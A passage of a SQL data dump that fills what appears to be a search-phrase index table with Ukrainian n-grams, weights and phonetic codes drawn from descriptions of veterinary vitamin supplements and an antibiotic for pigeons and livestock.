організму',0,1,1.8,'р000',1,'*'),(1546912,'резистентність організму до','резистентність організму до',0,1,1.9,'р000',1,'*'),(1546913,'ретинол','ретинол',0,0,0.4667,'р000',1,'*'),(1546914,'ретинол 10','ретинол 10',0,1,1.3333,'р000',1,'*'),(1546915,'ретинол 10 000','ретинол 10 000',0,1,1.4667,'р000',1,'*'),(1546916,'речовин забезпечує','речовин забезпечує',0,1,1.6,'р000',1,'*'),(1546917,'речовин забезпечує високий','речовин забезпечує високий',0,1,1.8667,'р000',1,'*'),(1546918,'рибофлавін','рибофлавін',0,0,0.6667,'р000',1,'*'),(1546919,'рибофлавін 2500','рибофлавін 2500',0,1,1.5,'р000',1,'*'),(1546920,'рибофлавін 2500 мг','рибофлавін 2500 мг',0,1,1.6,'р000',1,'*'),(1546921,'розвитку молодняка','розвитку молодняка',0,1,1.6,'р000',1,'*'),(1546922,'розвитку молодняка та','розвитку молодняка та',0,1,1.7,'р000',1,'*'),(1546923,'розчин','розчин',0,0,0.4,'р000',2,'*'),(1546924,'розчин готують','розчин готують',0,1,1.4667,'р000',1,'*'),(1546925,'розчин готують кожного','розчин готують кожного',0,1,1.7333,'р000',1,'*'),(1546926,'розчин задаютьгруповим','розчин задаютьгруповим',0,1,1.7333,'р000',1,'*'),(1546927,'розчин задаютьгруповим способом','розчин задаютьгруповим способом',0,1,2,'р000',1,'*'),(1546928,'розчин придатний','розчин придатний',0,1,1.5333,'р000',1,'*'),(1546929,'розчин придатний протягом','розчин придатний протягом',0,1,1.8333,'р000',1,'*'),(1546930,'розчин протягом','розчин протягом',0,1,1.5,'р000',1,'*'),(1546931,'розчин протягом доби','розчин протягом доби',0,1,1.6667,'р000',1,'*'),(1546932,'розчиняється','розчиняється',0,0,0.8,'р000',1,'*'),(1546933,'розчиняється у','розчиняється у',0,1,1.4667,'р000',1,'*'),(1546934,'розчиняється у воді','розчиняється у воді',0,1,1.6333,'р000',1,'*'),(1546935,'розчиняють','розчиняють',0,0,0.6667,'р000',1,'*'),(1546936,'розчиняють концентрат','розчиняють концентрат',0,1,1.7,'р000',1,'*'),(1546937,'розчиняють концентрат у','розчиняють концентрат у',0,1,1.7667,'р000',1,'*'),(1546938,'розчиняють у','розчиняють у',0,1,1.4,'р000',1,'*'),(1546939,'розчиняють у воді','розчиняють у воді',0,1,1.5667,'р000',1,'*'),(1546940,'роль','роль',0,0,0.2667,'р000',1,'*'),(1546941,'роль каталізаторів','роль каталізаторів',0,1,1.6,'р000',1,'*'),(1546942,'роль каталізаторів в','роль каталізаторів в',0,1,1.6667,'р000',1,'*'),(1546943,'росту','росту',0,0,0.3333,'р000',1,'*'),(1546944,'росту і','росту і',0,1,1.2333,'р000',1,'*'),(1546945,'росту і диференціації','росту і диференціації',0,1,1.7,'р000',1,'*'),(1546946,'с аскорбінова','с аскорбінова',0,1,1.4333,'с000',1,'*'),(1546947,'с аскорбінова кислота','с аскорбінова кислота',0,1,1.7,'с000',1,'*'),(1546948,'сількогосподарських','сількогосподарських',0,0,1,'с000',1,'*'),(1546949,'сількогосподарських тварин','сількогосподарських тварин',0,1,1.8667,'с000',1,'*'),(1546950,'сількогосподарських тварин і','сількогосподарських тварин і',0,1,1.9333,'с000',1,'*'),(1546951,'самців','самців',0,0,0.4,'с000',1,'*'),(1546952,'самців та','самців та',0,1,1.3,'с000',1,'*'),(1546953,'самців та збільшення','самців та збільшення',0,1,1.6667,'с000',1,'*'),(1546954,'світло-коричневого','світло-коричневого',0,0,1,'с000',1,'*'),(1546955,'світло-коричневого кольору','світло-коричневого кольору',0,1,1.8667,'с000',1,'*'),(1546956,'світло-коричневого кольору із','світло-коричневого кольору із',0,1,1.9667,'с000',1,'*'),(1546957,'селен','селен',0,0,0.3333,'с000',1,'*'),(1546958,'селен 33','селен 33',0,1,1.2667,'с000',1,'*'),(1546959,'селен 33 мг','селен 33 мг',0,1,1.3667,'с000',1,'*'),(1546960,'селен бере','селен бере',0,1,1.3333,'с000',1,'*'),(1546961,'селен бере участь','селен бере участь',0,1,1.5667,'с000',1,'*'),(1546962,'селену','селену',0,0,0.4,'с000',1,'*'),(1546963,'селену і','селену і',0,1,1.2667,'с000',1,'*'),(1546964,'селену і амінокислот','селену і амінокислот',0,1,1.6667,'с000',1,'*'),(1546965,'селену застереження','селену застереження',0,1,1.6333,'с000',1,'*'),(1546966,'селену застереження не','селену застереження не',0,1,1.7333,'с000',1,'*'),(1546967,'селену які','селену які',0,1,1.3333,'с000',1,'*'),(1546968,'селену які входять','селену які входять',0,1,1.6,'с000',1,'*'),(1546969,'середовища','середовища',0,0,0.6667,'с000',1,'*'),(1546970,'середовища та','середовища та',0,1,1.4333,'с000',1,'*'),(1546971,'середовища та попереджує','середовища та попереджує',0,1,1.8,'с000',1,'*'),(1546972,'синтезу','синтезу',0,0,0.4667,'с000',2,'*'),(1546973,'синтезу білка','синтезу білка',0,1,1.4333,'с000',1,'*'),(1546974,'синтезу білка селен','синтезу білка селен',0,1,1.6333,'с000',1,'*'),(1546975,'сипучий','сипучий',0,0,0.4667,'с000',1,'*'),(1546976,'сипучий порошок','сипучий порошок',0,1,1.5,'с000',1,'*'),(1546977,'сипучий порошок від','сипучий порошок від',0,1,1.6333,'с000',1,'*'),(1546978,'системи під','системи під',0,1,1.3667,'с000',1,'*'),(1546979,'системи під час','системи під час',0,1,1.5,'с000',1,'*'),(1546980,'ситуаціях','ситуаціях',0,0,0.6,'с000',1,'*'),(1546981,'ситуаціях застосування','ситуаціях застосування',0,1,1.7333,'с000',1,'*'),(1546982,'ситуаціях застосування нутріфарм','ситуаціях застосування нутріфарм',0,1,2,'с000',1,'*'),(1546983,'складу','складу',0,0,0.4,'с000',2,'*'),(1546984,'складу вітаміни','складу вітаміни',0,1,1.5,'с000',1,'*'),(1546985,'складу вітаміни відіграють','складу вітаміни відіграють',0,1,1.8667,'с000',1,'*'),(1546986,'співвідношенні 1','співвідношенні 1',0,1,1.5333,'с000',1,'*'),(1546987,'співвідношенні 1 г','співвідношенні 1 г',0,1,1.6,'с000',1,'*'),(1546988,'специфічним запахом що','специфічним запахом що',0,1,1.7333,'с000',1,'*'),(1546989,'способом для','способом для',0,1,1.4,'с000',1,'*'),(1546990,'способом для чого','способом для чого',0,1,1.5667,'с000',1,'*'),(1546991,'спричинених','спричинених',0,0,0.7333,'с000',1,'*'),(1546992,'спричинених недостатністю','спричинених недостатністю',0,1,1.8333,'с000',1,'*'),(1546993,'спричинених недостатністю селену','спричинених недостатністю селену',0,1,2,'с000',1,'*'),(1546994,'стану','стану',0,0,0.3333,'с000',1,'*'),(1546995,'стану його','стану його',0,1,1.3333,'с000',1,'*'),(1546996,'стану його здоров\'я','стану його здоров',0,1,1.6333,'с000',1,'*'),(1546997,'статевої','статевої',0,0,0.5333,'с000',1,'*'),(1546998,'статевої активності','статевої активності',0,1,1.6333,'с000',1,'*'),(1546999,'статевої активності самців','статевої активності самців',0,1,1.8667,'с000',1,'*'),(1547000,'стимуляції','стимуляції',0,0,0.6667,'с000',1,'*'),(1547001,'стимуляції імунної','стимуляції імунної',0,1,1.6,'с000',1,'*'),(1547002,'стимуляції імунної системи','стимуляції імунної системи',0,1,1.8667,'с000',1,'*'),(1547003,'стрес-факторів','стрес-факторів',0,0,0.9333,'с000',1,'*'),(1547004,'стрес-факторів різного','стрес-факторів різного',0,1,1.7333,'с000',1,'*'),(1547005,'стрес-факторів різного походження','стрес-факторів різного походження',0,1,2,'с000',1,'*'),(1547006,'стресових','стресових',0,0,0.6,'с000',1,'*'),(1547007,'стресових ситуаціях','стресових ситуаціях',0,1,1.6333,'с000',1,'*'),(1547008,'стресових ситуаціях застосування','стресових ситуаціях застосування',0,1,2,'с000',1,'*'),(1547009,'суміш з','суміш з',0,1,1.2333,'с000',1,'*'),(1547010,'суміш з кормом','суміш з кормом',0,1,1.4667,'с000',1,'*'),(1547011,'суміші','суміші',0,0,0.4,'с000',1,'*'),(1547012,'суміші з','суміші з',0,1,1.2667,'с000',1,'*'),(1547013,'суміші з кормом','суміші з кормом',0,1,1.5,'с000',1,'*'),(1547014,'сухому недоступному','сухому недоступному',0,1,1.6333,'с000',1,'*'),(1547015,'сухому недоступному для','сухому недоступному для',0,1,1.7667,'с000',1,'*'),(1547016,'тіамін','тіамін',0,0,0.4,'т000',1,'*'),(1547017,'тіамін 1250','тіамін 1250',0,1,1.3667,'т000',1,'*'),(1547018,'тіамін 1250 мг','тіамін 1250 мг',0,1,1.4667,'т000',1,'*'),(1547019,'та 1000','та 1000',0,1,1.2333,'т000',1,'*'),(1547020,'та 1000 г','та 1000 г',0,1,1.3,'т000',1,'*'),(1547021,'та використовують','та використовують',0,1,1.5667,'т000',1,'*'),(1547022,'та використовують з','та використовують з',0,1,1.6333,'т000',1,'*'),(1547023,'та задають','та задають',0,1,1.3333,'т000',1,'*'),(1547024,'та задають тварині','та задають тварині',0,1,1.6,'т000',1,'*'),(1547025,'та збільшення','та збільшення',0,1,1.4333,'т000',1,'*'),(1547026,'та збільшення тривалості','та збільшення тривалості',0,1,1.8,'т000',1,'*'),(1547027,'та лікування гіповітамінозів','та лікування гіповітамінозів',0,1,1.9333,'т000',1,'*'),(1547028,'та покращення','та покращення',0,1,1.4333,'т000',1,'*'),(1547029,'та покращення стану','та покращення стану',0,1,1.6333,'т000',1,'*'),(1547030,'та попереджує','та попереджує',0,1,1.4333,'т000',1,'*'),(1547031,'та попереджує пошкодження','та попереджує пошкодження',0,1,1.8333,'т000',1,'*'),(1547032,'та селену','та селену',0,1,1.3,'т000',1,'*'),(1547033,'та селену які','та селену які',0,1,1.4333,'т000',1,'*'),(1547034,'тварин і','тварин і',0,1,1.2667,'т000',1,'*'),(1547035,'тварин і птиці','тварин і птиці',0,1,1.4667,'т000',1,'*'),(1547036,'тварин незамінні','тварин незамінні',0,1,1.5333,'т000',1,'*'),(1547037,'тварин незамінні амінокислоти','тварин незамінні амінокислоти',0,1,1.9667,'т000',1,'*'),(1547038,'тварині','тварині',0,0,0.4667,'т000',1,'*'),(1547039,'тварині протягом','тварині протягом',0,1,1.5333,'т000',1,'*'),(1547040,'тварині протягом доби','тварині протягом доби',0,1,1.7,'т000',1,'*'),(1547041,'телятам','телятам',0,0,0.4667,'т000',1,'*'),(1547042,'телятам і','телятам і',0,1,1.3,'т000',1,'*'),(1547043,'телятам і лошатам','телятам і лошатам',0,1,1.5667,'т000',1,'*'),(1547044,'темп','темп',0,0,0.2667,'т000',1,'*'),(1547045,'темп розвитку','темп розвитку',0,1,1.4333,'т000',1,'*'),(1547046,'темп розвитку молодняка','темп розвитку молодняка',0,1,1.7667,'т000',1,'*'),(1547047,'температурі не','температурі не',0,1,1.4667,'т000',1,'*'),(1547048,'температурі не вище','температурі не вище',0,1,1.6333,'т000',1,'*'),(1547049,'тиреоїдних','тиреоїдних',0,0,0.6667,'т000',1,'*'),(1547050,'тиреоїдних гормонів','тиреоїдних гормонів',0,1,1.6333,'т000',1,'*'),(1547051,'тиреоїдних гормонів гормонів','тиреоїдних гормонів гормонів',0,1,1.9333,'т000',1,'*'),(1547052,'токоферол','токоферол',0,0,0.6,'т000',1,'*'),(1547053,'токоферол ацетат','токоферол ацетат',0,1,1.5333,'т000',1,'*'),(1547054,'токоферол ацетат 5500','токоферол ацетат 5500',0,1,1.7,'т000',1,'*'),(1547055,'тривалості','тривалості',0,0,0.6667,'т000',1,'*'),(1547056,'тривалості використання','тривалості використання',0,1,1.7667,'т000',1,'*'),(1547057,'тривалості використання маточного','тривалості використання маточного',0,1,2,'т000',1,'*'),(1547058,'триптофан','триптофан',0,0,0.6,'т000',1,'*'),(1547059,'триптофан 600','триптофан 600',0,1,1.4333,'т000',1,'*'),(1547060,'триптофан 600 мг','триптофан 600 мг',0,1,1.5333,'т000',1,'*'),(1547061,'у воді','у воді',0,1,1.2,'у000',2,'*'),(1547062,'у воді склад','у воді склад',0,1,1.4,'у000',2,'*'),(1547063,'у воді чи','у воді чи',0,1,1.3,'у000',1,'*'),(1547064,'у гарячий','у гарячий',0,1,1.3,'у000',1,'*'),(1547065,'у гарячий корм','у гарячий корм',0,1,1.4667,'у000',1,'*'),(1547066,'у дозах','у дозах',0,1,1.2333,'у000',2,'*'),(1547067,'у дозах домашній','у дозах домашній',0,1,1.5333,'у000',1,'*'),(1547068,'у питній','у питній',0,1,1.2667,'у000',1,'*'),(1547069,'у питній воді','у питній воді',0,1,1.4333,'у000',1,'*'),(1547070,'у співвідношенні','у співвідношенні',0,1,1.5333,'у000',1,'*'),(1547071,'у співвідношенні 1','у співвідношенні 1',0,1,1.6,'у000',1,'*'),(1547072,'у суміші','у суміші',0,1,1.2667,'у000',1,'*'),(1547073,'у суміші з','у суміші з',0,1,1.3333,'у000',1,'*'),(1547074,'участь','участь',0,0,0.4,'у000',3,'*'),(1547075,'участь в','участь в',0,1,1.2667,'у000',1,'*'),(1547076,'участь в метаболізмі','участь в метаболізмі',0,1,1.6667,'у000',1,'*'),(1547077,'факторів','факторів',0,0,0.5333,'ф000',1,'*'),(1547078,'факторів навколишнього','факторів навколишнього',0,1,1.7333,'ф000',1,'*'),(1547079,'факторів навколишнього середовища','факторів навколишнього середовища',0,1,2,'ф000',1,'*'),(1547080,'факторрозвитку','факторрозвитку',0,0,0.9333,'ф000',1,'*'),(1547081,'факторрозвитку підвищує','факторрозвитку підвищує',0,1,1.7667,'ф000',1,'*'),(1547082,'факторрозвитку підвищує резистентність','факторрозвитку підвищує резистентність',0,1,2,'ф000',1,'*'),(1547083,'фармакологiчнi властивостi властивості','фармакологiчнi властивостi властивості',0,1,2,'ф000',1,'*'),(1547084,'фолієва кислота 400','фолієва кислота 400',0,1,1.6333,'ф000',1,'*'),(1547085,'форма випуску пластикові','форма випуску пластикові',0,1,1.8,'ф000',2,'*'),(1547086,'холекальциферол','холекальциферол',0,0,1,'х000',1,'*'),(1547087,'холекальциферол 700','холекальциферол 700',0,1,1.6333,'х000',1,'*'),(1547088,'холекальциферол 700 000','холекальциферол 700 000',0,1,1.7667,'х000',1,'*'),(1547089,'хрякам','хрякам',0,0,0.4,'х000',1,'*'),(1547090,'хрякам 5-10','хрякам 5-10',0,1,1.3667,'х000',1,'*'),(1547091,'хрякам 5-10 г','хрякам 5-10 г',0,1,1.4333,'х000',1,'*'),(1547092,'ціанокобаламін','ціанокобаламін',0,0,0.9333,'ц000',1,'*'),(1547093,'ціанокобаламін 7,5','ціанокобаламін 7,5',0,1,1.6,'ц000',1,'*'),(1547094,'ціанокобаламін 7,5 мг','ціанокобаламін 7,5 мг',0,1,1.7,'ц000',1,'*'),(1547095,'час','час',0,0,0.2,'ч000',4,'*'),(1547096,'час вакцинації','час вакцинації',0,1,1.4667,'ч000',1,'*'),(1547097,'час вакцинації підвищення','час вакцинації підвищення',0,1,1.8333,'ч000',1,'*'),(1547098,'чи','чи',0,0,0.1333,'ч000',3,'*'),(1547099,'чи у','чи у',0,1,1.1333,'ч000',1,'*'),(1547100,'чи у суміші','чи у суміші',0,1,1.3667,'ч000',1,'*'),(1547101,'чого','чого',0,0,0.2667,'ч000',2,'*'),(1547102,'чого розчиняють','чого розчиняють',0,1,1.5,'ч000',1,'*'),(1547103,'чого розчиняють концентрат','чого розчиняють концентрат',0,1,1.8667,'ч000',1,'*'),(1547104,'щитовидної','щитовидної',0,0,0.6667,'щ000',1,'*'),(1547105,'щитовидної залози','щитовидної залози',0,1,1.5667,'щ000',1,'*'),(1547106,'щитовидної залози які','щитовидної залози які',0,1,1.7,'щ000',1,'*'),(1547107,'що','що',0,0,0.1333,'щ000',12,'*'),(1547108,'що достатньо','що достатньо',0,1,1.4,'щ000',1,'*'),(1547109,'що достатньо для','що достатньо для',0,1,1.5333,'щ000',1,'*'),(1547110,'що розчиняється','що розчиняється',0,1,1.5,'щ000',1,'*'),(1547111,'що розчиняється у','що розчиняється у',0,1,1.5667,'щ000',1,'*'),(1547112,'ягнятам','ягнятам',0,0,0.4667,'я000',1,'*'),(1547113,'ягнятам і','ягнятам і',0,1,1.3,'я000',1,'*'),(1547114,'ягнятам і козлятам','ягнятам і козлятам',0,1,1.6,'я000',1,'*'),(1547115,'яйценоскість','яйценоскість',0,0,0.8,'я000',1,'*'),(1547116,'яйценоскість нормалізує','яйценоскість нормалізує',0,1,1.7667,'я000',1,'*'),(1547117,'яйценоскість нормалізує обмін','яйценоскість нормалізує обмін',0,1,1.9667,'я000',1,'*'),(1547118,'які','які',0,0,0.2,'я000',11,'*'),(1547119,'які входять','які входять',0,1,1.3667,'я000',2,'*'),(1547120,'які входять до','які входять до',0,1,1.4667,'я000',2,'*'),(1547121,'які необхідні','які необхідні',0,1,1.4333,'я000',1,'*'),(1547122,'які необхідні для','які необхідні для',0,1,1.5667,'я000',1,'*'),(1547679,'10 200','10 200',0,1,1.2,'',1,'*'),(1547680,'10 200 г','10 200 г',0,1,1.2667,'г000',1,'*'),(1547681,'1л','1л',0,0,0.1333,'л000',1,'*'),(1547682,'1л води','1л води',0,1,1.2333,'л000',1,'*'),(1547683,'1л води протягом','1л води протягом',0,1,1.5333,'л000',1,'*'),(1547684,'2 днів','2 днів',0,1,1.2,'д000',1,'*'),(1547685,'2 днів після','2 днів після',0,1,1.4,'д000',1,'*'),(1547686,'2,5','2,5',0,0,0.3,'',1,'*'),(1547687,'2,5 г','2,5 г',0,1,1.1667,'г000',1,'*'),(1547688,'2,5 г 1','2,5 г 1',0,1,1.2333,'г000',1,'*'),(1547689,'2,5 г 1л','2,5 г 1л',0,1,1.2667,'г000',1,'*'),(1547690,'2460','2460',0,0,0.4,'',1,'*'),(1547691,'25 с виробник','25 с виробник',0,1,1.4333,'с000',1,'*'),(1547692,'3 днів','3 днів',0,1,1.2,'д000',1,'*'),(1547693,'3 днів для','3 днів для',0,1,1.3333,'д000',1,'*'),(1547694,'33001','33001',0,0,0.5,'',1,'*'),(1547695,'40 голубів','40 голубів',0,1,1.3333,'г000',1,'*'),(1547696,'40 голубів протягом','40 голубів протягом',0,1,1.6333,'г000',1,'*'),(1547697,'5 г','5 г',0,1,1.1,'г000',1,'*'),(1547698,'5 г 1','5 г 1',0,1,1.1667,'г000',1,'*'),(1547699,'5 днів','5 днів',0,1,1.2,'д000',1,'*'),(1547700,'5 днів на','5 днів на',0,1,1.3,'д000',1,'*'),(1547701,'5-7','5-7',0,0,0.3,'',1,'*'),(1547702,'5-7 днів','5-7 днів',0,1,1.2667,'д000',1,'*'),(1547703,'5-7 днів при','5-7 днів при',0,1,1.4,'д000',1,'*'),(1547704,'8-16','8-16',0,0,0.4,'',1,'*'),(1547705,'8-16 днів','8-16 днів',0,1,1.3,'д000',1,'*'),(1547706,'8-16 днів для','8-16 днів для',0,1,1.4333,'д000',1,'*'),(1547707,'89 м','89 м',0,1,1.1333,'м000',1,'*'),(1547708,'89 м рівне','89 м рівне',0,1,1.3333,'м000',1,'*'),(1547709,'antibakterialnij','antibakterialnij',0,0,1,'A531236452',1,'*'),(1547710,'antibakterialnij preparat','antibakterialnij preparat',0,1,1.8333,'A53123645216163',1,'*'),(1547711,'antibakterialnij preparat dlya','antibakterialnij preparat dlya',0,1,2,'A531236452161634',1,'*'),(1547712,'chlamydophila','chlamydophila',0,0,0.8667,'C45314',1,'*'),(1547713,'chlamydophila psittaci','chlamydophila psittaci',0,1,1.7333,'C453141232',1,'*'),(1547714,'chlamydophila psittaci мікоплазмоза','chlamydophila psittaci мікоплазмоза',0,1,2,'C453141232',1,'*'),(1547715,'coli','coli',0,0,0.2667,'C400',2,'*'),(1547716,'coli pelistega','coli pelistega',0,1,1.4667,'C414232',1,'*'),(1547717,'coli pelistega europea','coli pelistega europea',0,1,1.7333,'C41423261',1,'*'),(1547718,'columborale','columborale',0,0,0.7333,'C45164',1,'*'),(1547719,'columborale кишкової','columborale кишкової',0,1,1.6667,'C45164',1,'*'),(1547720,'columborale кишкової палички','columborale кишкової палички',0,1,1.9333,'C45164',1,'*'),(1547721,'dlya sistemnogo','dlya sistemnogo',0,1,1.5,'D42352',1,'*'),(1547722,'dlya sistemnogo zastosuvannya','dlya sistemnogo zastosuvannya',0,1,1.9667,'D423523215',1,'*'),(1547723,'esherichia','esherichia',0,0,0.6667,'E262',1,'*'),(1547724,'esherichia coli','esherichia coli',0,1,1.5,'E2624',1,'*'),(1547725,'esherichia coli pelistega','esherichia coli pelistega',0,1,1.8333,'E262414232',1,'*'),(1547726,'europea','europea',0,0,0.4667,'E610',1,'*'),(1547727,'europea staphylococus','europea staphylococus',0,1,1.7,'E6123142',1,'*'),(1547728,'europea staphylococus intermedius','europea staphylococus intermedius',0,1,2,'E6123142536532',1,'*'),(1547729,'gallinae симптоми','gallinae симптоми',0,1,1.5667,'G450',1,'*'),(1547730,'gallinae симптоми чхання','gallinae симптоми чхання',0,1,1.8,'G450',1,'*'),(1547731,'intermedius','intermedius',0,0,0.7333,'I536532',1,'*'),(1547732,'intermedius трихомонозу','intermedius трихомонозу',0,1,1.7667,'I536532',1,'*'),(1547733,'intermedius трихомонозу trichomonas','intermedius трихомонозу trichomonas',0,1,2,'I53653236252',1,'*'),(1547734,'mycoplasma columborale','mycoplasma columborale',0,1,1.7333,'M21425245164',1,'*'),(1547735,'mycoplasma columborale кишкової','mycoplasma columborale кишкової',0,1,2,'M21425245164',1,'*'),(1547736,'pelistega','pelistega',0,0,0.6,'P4232',1,'*'),(1547737,'pelistega europea','pelistega europea',0,1,1.5667,'P423261',1,'*'),(1547738,'pelistega europea staphylococus','pelistega europea staphylococus',0,1,2,'P42326123142',1,'*'),(1547739,'preparat dlya','preparat dlya',0,1,1.4333,'P61634',1,'*'),(1547740,'preparat dlya sistemnogo','preparat dlya sistemnogo',0,1,1.8,'P616342352',1,'*'),(1547741,'psittaci','psittaci',0,0,0.5333,'P232',1,'*'),(1547742,'psittaci мікоплазмоза','psittaci мікоплазмоза',0,1,1.7,'P232',1,'*'),(1547743,'psittaci мікоплазмоза mycoplasma','psittaci мікоплазмоза mycoplasma',0,1,2,'P232521425',1,'*'),(1547744,'sistemnogo','sistemnogo',0,0,0.6667,'S352',1,'*'),(1547745,'sistemnogo zastosuvannya','sistemnogo zastosuvannya',0,1,1.8,'S3523215',1,'*'),(1547746,'staphylococus','staphylococus',0,0,0.8667,'S3142',1,'*'),(1547747,'staphylococus intermedius','staphylococus intermedius',0,1,1.8333,'S3142536532',1,'*'),(1547748,'staphylococus intermedius трихомонозу','staphylococus intermedius трихомонозу',0,1,2,'S3142536532',1,'*'),(1547749,'tilotsiklin','tilotsiklin',0,0,0.7333,'T43245',1,'*'),(1547750,'tilotsiklin antibakterialnij','tilotsiklin antibakterialnij',0,1,1.9333,'T4324531236452',1,'*'),(1547751,'tilotsiklin antibakterialnij preparat','tilotsiklin antibakterialnij preparat',0,1,2,'T432453123645216163',1,'*'),(1547752,'trichomonas gallinae','trichomonas gallinae',0,1,1.6667,'T625245',1,'*'),(1547753,'trichomonas gallinae симптоми','trichomonas gallinae симптоми',0,1,1.9667,'T625245',1,'*'),(1547754,'zastosuvannya','zastosuvannya',0,0,0.8667,'Z3215',1,'*'),(1547755,'і декоративних','і декоративних',0,1,1.4667,'і000',1,'*'),(1547756,'і декоративних птахів','і декоративних птахів',0,1,1.7,'і000',1,'*'),(1547757,'і орнітозі','і орнітозі',0,1,1.3333,'і000',1,'*'),(1547758,'і орнітозі 5','і орнітозі 5',0,1,1.4,'і000',1,'*'),(1547759,'і профілактики','і профілактики',0,1,1.4667,'і000',2,'*'),(1547760,'і профілактики в','і профілактики в',0,1,1.5333,'і000',1,'*'),(1547761,'їжу форма','їжу форма',0,1,1.3,'ї000',1,'*'),(1547762,'їжу форма випуску','їжу форма випуску',0,1,1.5667,'ї000',1,'*'),(1547763,'або тренування','або тренування',0,1,1.4667,'а000',1,'*'),(1547764,'або тренування застереження','або тренування застереження',0,1,1.9,'а000',1,'*'),(1547765,'антибактеріальний','антибактеріальний',0,0,1,'а000',1,'*'),(1547766,'антибактеріальний препарат','антибактеріальний препарат',0,1,1.8667,'а000',1,'*'),(1547767,'антибактеріальний препарат для','антибактеріальний препарат для',0,1,2,'а000',1,'*'),(1547768,'в їжу форма','в їжу форма',0,1,1.3667,'в000',1,'*'),(1547769,'в голубів','в голубів',0,1,1.3,'в000',2,'*'),(1547770,'в голубів і','в голубів і',0,1,1.3667,'в000',1,'*'),(1547771,'в роті','в роті',0,1,1.2,'в000',1,'*'),(1547772,'в роті нальоти','в роті нальоти',0,1,1.4667,'в000',1,'*'),(1547773,'відкритим','відкритим',0,0,0.6,'в000',1,'*'),(1547774,'відкритим дзьобом','відкритим дзьобом',0,1,1.5667,'в000',1,'*'),(1547775,'відкритим дзьобом збільшена','відкритим дзьобом збільшена',0,1,1.9,'в000',1,'*'),(1547776,'вживання','вживання',0,0,0.5333,'в000',1,'*'),(1547777,'вживання в','вживання в',0,1,1.3333,'в000',1,'*'),(1547778,'вживання в їжу','вживання в їжу',0,1,1.4667,'в000',1,'*'),(1547779,'виділення','виділення',0,0,0.6,'в000',1,'*'),(1547780,'виділення з','виділення з',0,1,1.3667,'в000',1,'*'),(1547781,'виділення з носа','виділення з носа',0,1,1.5333,'в000',1,'*'),(1547782,'використовувати для','використовувати для',0,1,1.6333,'в000',1,'*'),(1547783,'використовувати для птахів','використовувати для птахів',0,1,1.8667,'в000',1,'*'),(1547784,'воді склад препарат','воді склад препарат',0,1,1.6333,'в000',1,'*'),(1547785,'води 40','води 40',0,1,1.2333,'в000',1,'*'),(1547786,'води 40 голубів','води 40 голубів',0,1,1.5,'в000',1,'*'),(1547787,'води протягом','води протягом',0,1,1.4333,'в000',1,'*'),(1547788,'води протягом 2','води протягом 2',0,1,1.5,'в000',1,'*'),(1547789,'води протягом 3','води протягом 3',0,1,1.5,'в000',1,'*'),(1547790,'води протягом 5','води протягом 5',0,1,1.5,'в000',1,'*'),(1547791,'води протягом 8-16','води протягом 8-16',0,1,1.6,'в000',1,'*'),(1547792,'г 1','г 1',0,1,1.1,'г000',2,'*'),(1547793,'г 1 л','г 1 л',0,1,1.1667,'г000',1,'*'),(1547794,'г 1л','г 1л',0,1,1.1333,'г000',1,'*'),(1547795,'г 1л води','г 1л води',0,1,1.3,'г000',1,'*'),(1547796,'гарної','гарної',0,0,0.4,'г000',1,'*'),(1547797,'гарної фізичної','гарної фізичної',0,1,1.5,'г000',1,'*'),(1547798,'гарної фізичної форми','гарної фізичної форми',0,1,1.7,'г000',1,'*'),(1547799,'голубів і','голубів і',0,1,1.3,'г000',1,'*'),(1547800,'голубів і декоративних','голубів і декоративних',0,1,1.7333,'г000',1,'*'),(1547801,'голубів протягом 5-7','голубів протягом 5-7',0,1,1.6667,'г000',1,'*'),(1547802,'гонки','гонки',0,0,0.3333,'г000',1,'*'),(1547803,'гонки або','гонки або',0,1,1.3,'г000',1,'*'),(1547804,'гонки або тренування','гонки або тренування',0,1,1.6667,'г000',1,'*'),(1547805,'гоночного','гоночного',0,0,0.6,'г000',1,'*'),(1547806,'гоночного сезону','гоночного сезону',0,1,1.5333,'г000',1,'*'),(1547807,'гоночного сезону для','гоночного сезону для',0,1,1.6667,'г000',1,'*'),(1547808,'горлі','горлі',0,0,0.3333,'г000',1,'*'),(1547809,'горлі гортані','горлі гортані',0,1,1.4333,'г000',1,'*'),(1547810,'горлі гортані трахеї','горлі гортані трахеї',0,1,1.6667,'г000',1,'*'),(1547811,'гортані','гортані',0,0,0.4667,'г000',1,'*'),(1547812,'гортані трахеї','гортані трахеї',0,1,1.4667,'г000',1,'*'),(1547813,'гортані трахеї дозування','гортані трахеї дозування',0,1,1.8,'г000',1,'*'),(1547814,'гострій','гострій',0,0,0.4667,'г000',1,'*'),(1547815,'гострій формі','гострій формі',0,1,1.4333,'г000',1,'*'),(1547816,'гострій формі і','гострій формі і',0,1,1.5,'г000',1,'*'),(1547817,'дворецька 89 м','дворецька 89 м',0,1,1.4667,'д000',1,'*'),(1547818,'декоративних птахів при','декоративних птахів при',0,1,1.7667,'д000',2,'*'),(1547819,'дзьобом','дзьобом',0,0,0.4667,'д000',1,'*'),(1547820,'дзьобом збільшена','дзьобом збільшена',0,1,1.5667,'д000',1,'*'),(1547821,'дзьобом збільшена кількість','дзьобом збільшена кількість',0,1,1.9,'д000',1,'*'),(1547822,'дихальних','дихальних',0,0,0.6,'д000',1,'*'),(1547823,'дихальних шляхів','дихальних шляхів',0,1,1.5333,'д000',1,'*'),(1547824,'дихальних шляхів орнітозу','дихальних шляхів орнітозу',0,1,1.8333,'д000',1,'*'),(1547825,'дихання','дихання',0,0,0.4667,'д000',1,'*'),(1547826,'дихання виділення','дихання виділення',0,1,1.5667,'д000',1,'*'),(1547827,'дихання виділення з','дихання виділення з',0,1,1.6333,'д000',1,'*'),(1547828,'дихання з','дихання з',0,1,1.3,'д000',1,'*'),(1547829,'дихання з відкритим','дихання з відкритим',0,1,1.6333,'д000',1,'*'),(1547830,'для вживання','для вживання',0,1,1.4,'д000',1,'*'),(1547831,'для вживання в','для вживання в',0,1,1.4667,'д000',1,'*'),(1547832,'для досягнення','для досягнення',0,1,1.4667,'д000',1,'*'),(1547833,'для досягнення гарної','для досягнення гарної',0,1,1.7,'д000',1,'*'),(1547834,'для лікування','для лікування',0,1,1.4333,'д000',2,'*'),(1547835,'для лікування 2,5','для лікування 2,5',0,1,1.5667,'д000',1,'*'),(1547836,'для лікування і','для лікування і',0,1,1.5,'д000',2,'*'),(1547837,'для підтримки','для підтримки',0,1,1.4333,'д000',1,'*'),(1547838,'для підтримки спортивної','для підтримки спортивної',0,1,1.8,'д000',1,'*'),(1547839,'для профілактики щомісячно','для профілактики щомісячно',0,1,1.8667,'д000',1,'*'),(1547840,'для птахів','для 